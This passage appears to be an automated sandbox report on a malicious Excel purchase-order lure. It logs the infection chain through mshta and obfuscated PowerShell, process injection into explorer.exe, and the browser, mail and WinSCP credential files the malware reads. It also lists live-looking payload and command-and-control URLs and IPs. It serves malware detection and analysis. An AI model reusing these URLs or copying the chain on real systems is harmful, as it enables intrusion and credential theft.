          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Roaming\vtjrhjiQueries volume information: C:\Users\user\AppData\Roaming\vtjrhji VolumeInformation
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_00122112 GetSystemTimeAsFileTime,_alldiv,wsprintfA,38_2_00122112
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_00122198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,38_2_00122198
          Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 30.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000001E.00000002.522714130.00000000000C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001E.00000002.522844560.00000000001F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\moz-safe-about+home\.metadata-v2
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\xulstore.json
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\datareporting\state.json
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage.sqlite
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\compatibility.ini
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\content-prefs.sqlite
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\chrome\.metadata-v2
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\search.json.mozlz4
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\jetpack\@all-aboard-v1-6\simple-storage\store.json
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\mimeTypes.rdf
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\chrome\.metadata
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\permissions.sqlite
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\datareporting\session-state.json
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\datareporting\archived\2017-10\1508238380992.d07fbb40-1c13-49f0-9742-db90c57c7811.main.jsonlz4
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\SiteSecurityServiceState.txt
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\moz-safe-about+home\.metadata
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\addons.json
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\SecurityPreloadState.txt
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\saved-telemetry-pings\d07fbb40-1c13-49f0-9742-db90c57c7811
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\prefs.js
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\times.json
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\containers.json
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\AlternateServices.txt
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\pluginreg.dat
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\webappsstore.sqlite
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\parent.lock
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\blocklist.xml
          Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
          Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
          Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
          Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
          Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
          Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
          Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
          Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 30.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000001E.00000002.522714130.00000000000C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001E.00000002.522844560.00000000001F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information121
          Scripting
          Valid Accounts1
          Native API
          121
          Scripting
          1
          DLL Side-Loading
          1
          Disable or Modify Tools
          1
          OS Credential Dumping
          1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          5
          Ingress Tool Transfer
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts33
          Exploitation for Client Execution
          1
          DLL Side-Loading
          612
          Process Injection
          11
          Deobfuscate/Decode Files or Information
          1
          Credentials in Registry
          13
          File and Directory Discovery
          Remote Desktop Protocol11
          Data from Local System
          21
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts121
          Command and Scripting Interpreter
          Logon Script (Windows)Logon Script (Windows)21
          Obfuscated Files or Information
          Security Account Manager128
          System Information Discovery
          SMB/Windows Admin Shares11
          Email Collection
          4
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts4
          PowerShell
          Login HookLogin Hook1
          Install Root Certificate
          NTDS331
          Security Software Discovery
          Distributed Component Object Model1
          Clipboard Data
          115
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading
          LSA Secrets141
          Virtualization/Sandbox Evasion
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
          Masquerading
          Cached Domain Credentials3
          Process Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
          Virtualization/Sandbox Evasion
          DCSync1
          Application Window Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job612
          Process Injection
          Proc Filesystem1
          Remote System Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Hidden Files and Directories
          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1557899 Sample: #U3010TW-S PO#U3011PO#3311-... Startdate: 18/11/2024 Architecture: WINDOWS Score: 100 131 Suricata IDS alerts for network traffic 2->131 133 Found malware configuration 2->133 135 Malicious sample detected (through community Yara rule) 2->135 137 22 other signatures 2->137 13 EXCEL.EXE 57 53 2->13         started        18 taskeng.exe 2->18         started        process3 dnsIp4 115 107.172.44.178, 49162, 49164, 49165 AS-COLOCROSSINGUS United States 13->115 117 link.uebie.de 5.45.108.48, 443, 49161, 49163 NETCUP-ASnetcupGmbHDE Germany 13->117 93 #U3010TW-S PO#U301...41118003.xls (copy), Composite 13->93 dropped 95 C:\Users\user\...\~DF7DC820911769618A.TMP, Composite 13->95 dropped 97 bestthingsalwaysge...gnswithgreat[1].hta, HTML 13->97 dropped 177 Microsoft Office drops suspicious files 13->177 20 mshta.exe 10 13->20         started        24 mshta.exe 13->24         started        26 AcroRd32.exe 21 13->26         started        28 vtjrhji 18->28         started        file5 signatures6 process7 dnsIp8 103 link.uebie.de 20->103 153 Suspicious powershell command line found 20->153 155 PowerShell case anomaly found 20->155 30 powershell.exe 23 20->30         started        105 link.uebie.de 24->105 34 powershell.exe 24->34         started        signatures9 process10 file11 99 seemybestnetworkwh...sentirelifewith.vbS, Unicode 30->99 dropped 101 C:\Users\user\AppData\...\03wlztsz.cmdline, Unicode 30->101 dropped 179 Suspicious powershell command line found 30->179 181 Obfuscated command line found 30->181 36 wscript.exe 1 30->36         started        39 powershell.exe 4 30->39         started        41 csc.exe 2 30->41         started        44 wscript.exe 34->44         started        46 csc.exe 34->46         started        48 powershell.exe 34->48         started        signatures12 process13 file14 143 Suspicious powershell command line found 36->143 145 Wscript starts Powershell (via cmd or directly) 36->145 147 Bypasses PowerShell execution policy 36->147 151 2 other signatures 36->151 50 powershell.exe 2 36->50         started        149 Installs new ROOT certificates 39->149 87 C:\Users\user\AppData\Local\...\03wlztsz.dll, PE32 41->87 dropped 53 cvtres.exe 41->53         started        55 powershell.exe 44->55         started        89 C:\Users\user\AppData\Local\...\mffkkngw.dll, PE32 46->89 dropped 57 cvtres.exe 46->57         started        signatures15 process16 signatures17 139 Suspicious powershell command line found 50->139 141 Obfuscated command line found 50->141 59 powershell.exe 50->59         started        63 powershell.exe 55->63         started        process18 dnsIp19 109 ip.1017.filemail.com 142.215.209.78, 443, 49166, 49173 HUMBER-COLLEGECA Canada 59->109 111 1017.filemail.com 59->111 165 Writes to foreign memory regions 59->165 167 Injects a PE file into a foreign processes 59->167 65 aspnet_compiler.exe 59->65         started        68 aspnet_compiler.exe 59->68         started        113 1017.filemail.com 63->113 70 aspnet_compiler.exe 63->70         started        signatures20 process21 signatures22 121 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 65->121 123 Maps a DLL or memory area into another process 65->123 125 Checks if the current machine is a virtual machine (disk enumeration) 65->125 72 explorer.exe 65->72 injected 127 Switches to a custom stack to bypass stack traces 68->127 129 Creates a thread in another existing process (thread injection) 70->129 process23 dnsIp24 107 prolinice.ga 46.173.214.24, 49175, 49176, 80 GARANT-PARK-INTERNETRU Russian Federation 72->107 91 C:\Users\user\AppData\Roaming\vtjrhji, PE32 72->91 dropped 157 Benign windows process drops PE files 72->157 159 Injects code into the Windows Explorer (explorer.exe) 72->159 161 Writes to foreign memory regions 72->161 163 Hides that the sample has been downloaded from the Internet (zone.identifier) 72->163 77 explorer.exe 72->77         started        81 explorer.exe 72->81         started        83 explorer.exe 72->83         started        85 6 other processes 72->85 file25 signatures26 process27 dnsIp28 119 prolinice.ga 77->119 169 System process connects to network (likely due to code injection or exploit) 77->169 171 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 77->171 173 Tries to steal Mail credentials (via file / registry access) 77->173 175 Tries to harvest and steal browser information (history, passwords, etc) 81->175 signatures29

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          #U3010TW-S PO#U3011PO#3311-20241118003.xls27%ReversingLabsWin32.Exploit.CVE-2017-0199
          #U3010TW-S PO#U3011PO#3311-20241118003.xls100%AviraTR/AVI.Agent.xoswb
          #U3010TW-S PO#U3011PO#3311-20241118003.xls100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\~DF7DC820911769618A.TMP100%AviraTR/AVI.Agent.xoswb
          C:\Users\user\AppData\Roaming\vtjrhji0%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helenXw~C0%Avira URL Cloudsafe
          http://prolinice.ga/ndex.php0%Avira URL Cloudsafe
          https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helenM?0%Avira URL Cloudsafe
          https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helen930%Avira URL Cloudsafe
          http://107.172.44.178/53/WRFFRGT.txt0%Avira URL Cloudsafe
          https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helenyX0%Avira URL Cloudsafe
          http://107.172.44.178/53/seemybe0%Avira URL Cloudsafe
          http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta30%Avira URL Cloudsafe
          http://prolinice.ga/index.php100%Avira URL Cloudmalware
          http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIFa0%Avira URL Cloudsafe
          http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta70%Avira URL Cloudsafe
          http://107.172.44.178/fW~(0%Avira URL Cloudsafe
          http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIFs0%Avira URL Cloudsafe
          http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF~0%Avira URL Cloudsafe
          https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helenUw~N0%Avira URL Cloudsafe
          https://link.uebie.de/vW~(0%Avira URL Cloudsafe
          https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helenJ0%Avira URL Cloudsafe
          http://prolinice.ga/0%Avira URL Cloudsafe
          https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helenesp0%Avira URL Cloudsafe
          https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helen0%Avira URL Cloudsafe
          https://link.uebie.de/~W~(0%Avira URL Cloudsafe
          http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF0%Avira URL Cloudsafe
          http://107.172.44.178/0%Avira URL Cloudsafe
          http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htah0%Avira URL Cloudsafe
          http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htae0%Avira URL Cloudsafe
          http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta0%Avira URL Cloudsafe
          http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIFp0%Avira URL Cloudsafe
          http://vilendar.ga/index.php100%Avira URL Cloudmalware
          http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htac0%Avira URL Cloudsafe
          http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htau0%Avira URL Cloudsafe
          http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta.0%Avira URL Cloudsafe
          https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helenVw~M0%Avira URL Cloudsafe
          https://link.uebie.de/0%Avira URL Cloudsafe
          http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.00%Avira URL Cloudsafe
          http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF=0%Avira URL Cloudsafe
          http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaM0%Avira URL Cloudsafe
          http://prolinice.ga/index.phpMozilla/5.00%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          link.uebie.de
          5.45.108.48
          truefalse
            high
            ip.1017.filemail.com
            142.215.209.78
            truefalse
              high
              prolinice.ga
              46.173.214.24
              truetrue
                unknown
                1017.filemail.com
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  http://107.172.44.178/53/WRFFRGT.txttrue
                  • Avira URL Cloud: safe
                  unknown
                  http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIFtrue
                  • Avira URL Cloud: safe
                  unknown
                  http://prolinice.ga/index.phptrue
                  • Avira URL Cloud: malware
                  unknown
                  http://vilendar.ga/index.phptrue
                  • Avira URL Cloud: malware
                  unknown
                  http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htatrue
                  • Avira URL Cloud: safe
                  unknown
                  https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904ffalse
                    high
                    https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helenfalse
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabexplorer.exe, 00000026.00000003.591178920.0000000000658000.00000004.00000020.00020000.00000000.sdmp, 402E.tmp.38.drfalse
                      high
                      http://prolinice.ga/ndex.phpexplorer.exe, 00000026.00000002.601139642.0000000000644000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/ac/?q=explorer.exe, 00000026.00000003.591178920.0000000000658000.00000004.00000020.00020000.00000000.sdmp, 402E.tmp.38.drfalse
                        high
                        http://ocsp.entrust.net03mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486943045.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487328121.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487409113.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.483846051.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487839067.0000000003BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIFapowershell.exe, 00000006.00000002.454017233.000000001A8CC000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://contoso.com/Licensepowershell.exe, 00000006.00000002.453312735.00000000120B1000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://1017.filemail.compowershell.exe, 00000010.00000002.511129884.00000000025C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.560114781.0000000002672000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486943045.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487409113.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.483846051.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487839067.0000000003BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helenXw~Cmshta.exe, 00000011.00000003.486994334.000000000014C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.476368039.000000000014D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta.mshta.exe, 00000005.00000003.421467560.0000000000386000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426031812.000000000031E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.476368039.000000000014D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487556654.00000000000FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
